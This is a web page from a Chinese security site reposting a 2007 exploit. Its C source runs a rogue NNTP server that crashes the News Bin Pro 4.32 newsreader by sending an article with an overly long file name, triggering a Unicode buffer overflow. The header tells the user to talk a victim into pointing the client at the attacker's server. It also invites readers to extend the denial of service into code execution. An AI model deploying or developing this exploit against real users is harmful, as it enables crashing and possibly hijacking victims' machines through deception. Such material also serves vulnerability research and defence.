首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 News Bin Pro 4.32 Article Grabbing Remote Unicode BoF Exploit 来源：Marsupilamipowa@hotmail.fr 作者：Marsu 发布时间：2007-03-13   /******************************************************************************** *      News Bin Pro 4.32 Article Grabbing Remote Unicode Buffer Overflow        * *                                                                               * *                                                                               * * There is remote buffer overflow in News Bin Pro 4.32 that can be triggered by * * grabbing articles that contain an overly long file name.                      * *                                                                               * * To exploit, convince someone to set his newsgroup server to your ip:119 and   * * ask him to download an article and to bypass filters.                         * *                                                                               * * This is just a DoS. I couldnt make EIP point to some interesting place. This  * * is a unicode buffer overflow and we can force EIP to point on 0x00410041. But * * there's no good call esp in those places. However if we can set EIP to        * * 0x41004100 the problem is solved. Tell me if you go further.                  * * Have Fun!                                                                     * *                                                                               * * Tested against WIN XP SP2 FR                                                  * * Coded and Discovered by Marsu <Marsupilamipowa@hotmail.fr>                    * ********************************************************************************/ #include "winsock2.h" #include "stdio.h" #include "time.h" #include "stdlib.h" #pragma comment(lib, "ws2_32.lib") int main(int argc, char* argv[]) { char recvbuff[1024]; char evilbuff[10000]; sockaddr_in sin; int server,client; WSADATA wsaData; WSAStartup(MAKEWORD(1,1), &wsaData); server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); sin.sin_family = PF_INET; sin.sin_addr.s_addr = htonl(INADDR_ANY); sin.sin_port = htons( 119 ); bind(server,(SOCKADDR*)&sin,sizeof(sin)); printf("[+] News Bin Pro 4.32 ARTICLE cmd Remote Unicode Buffer Overflow\n"); printf("[+] Coded and Discovered by Marsu <Marsupilamipowa@hotmail.fr>\n"); printf("[*] Listening on port 119...\n"); listen(server,5); printf("[*] Waiting for client...\n"); printf("[+] Once connected, ask him to download and bypass filter a post\n"); client=accept(server,NULL,NULL); printf("[+] Client connected\n"); if (send(client,"200 Hello there\r\n",17,0)==-1) { printf("[-] Error in send!\n"); exit(-1); } //MODE READER article or AUTHINFO user memset(recvbuff,0,1024); recv(client,recvbuff,1024,0); printf("-> %s\n",recvbuff); if (strstr(recvbuff,"AUTHINFO")) { send(client,"381 Pass please?\r\n",18,0); //authinfo pass memset(recvbuff,0,1024); recv(client,recvbuff,1024,0); printf("-> %s\n",recvbuff); send(client,"281 Pleased to meet you\r\n",25,0); //MODE READER memset(recvbuff,0,1024); recv(client,recvbuff,1024,0); printf("-> %s\n",recvbuff); } memcpy(evilbuff,"200 \r\n\0",7); send(client,evilbuff,strlen(evilbuff),0); //GROUP memset(recvbuff,0,1024); recv(client,recvbuff,1024,0); printf("-> %s\n",recvbuff); memcpy(evilbuff,"211 935430 87608194 88543623 alt.binaries.blabla\r\n\0",55); send(client,evilbuff,strlen(evilbuff),0); memset(recvbuff,0,1024); recv(client,recvbuff,1024,0); printf("-> %s\n",recvbuff); char* postname=(char *) malloc(strlen(recvbuff)*sizeof(char)); memset(postname,0,100); if (!strstr(recvbuff,"ARTICLE")) { printf("[-] ARTICLE were expected. Exploit will fail.\n"); } else { memcpy(postname,recvbuff+8,strlen(recvbuff)-8); printf("[+] Using %s to build evil data.\n",postname); } char header[]="220 0 "; char header2[]=" article\r\n" "Path: news.giganews.com.POSTED!not-for-mail\r\n" "NNTP-Posting-Date: Thu, 01 Mar 2007 11:25:26 -0600\r\n" "Lines: 5\r\n" "X-Postfilter: 1.3.34\r\n" "Xref:news.giganews.com alt.binaries.blabla:123456789\r\n\r\n\r\n" "=ybegin part=1 line=128 size=127 name="; //we put a large file name here to trigger the overflow char header3[]="\r\n" "=ypart begin=1 end=127\r\n" "blablabla\r\n" "=yend size=127 part=1 pcrc32=d4f19f0f\r\n" ".\r\n"; memset(evilbuff,'A',10000); memcpy(evilbuff,header,strlen(header)); memcpy(evilbuff+strlen(header),postname,strlen(postname)); memcpy(evilbuff+strlen(header)+strlen(postname),header2,strlen(header2)); memcpy(evilbuff+strlen(header)+strlen(postname)+strlen(header2)+2000,header3,strlen(header2)); send(client,evilbuff,strlen(evilbuff),0); printf("[+] Evil data sent. EIP should have become 0x00410041 \n    Tell me if you can go further =)\n"); Sleep(500); return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·NewsReactor 20070220 Article G ·TFTP Server 1.3 Remote Buffer ·NewsReactor 20070220 Article G ·PHP 5.2.0 ext/filter Space Tri ·MS Windows DCE-RPC svcctl Chan ·PHP <= 5.2.0 ext/filter FDF Po ·JGBBS 3.0beta1 (search.asp aut ·Oracle 10g (PROCESS_DUP_HANDLE ·Dayfox Blog 4 (postpost.php) R ·PostNuke Module phgstats 0.5 ( ·WSN Guest 1.21 (comments.php i ·JobSitePro 1.0 (search.php) Re   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved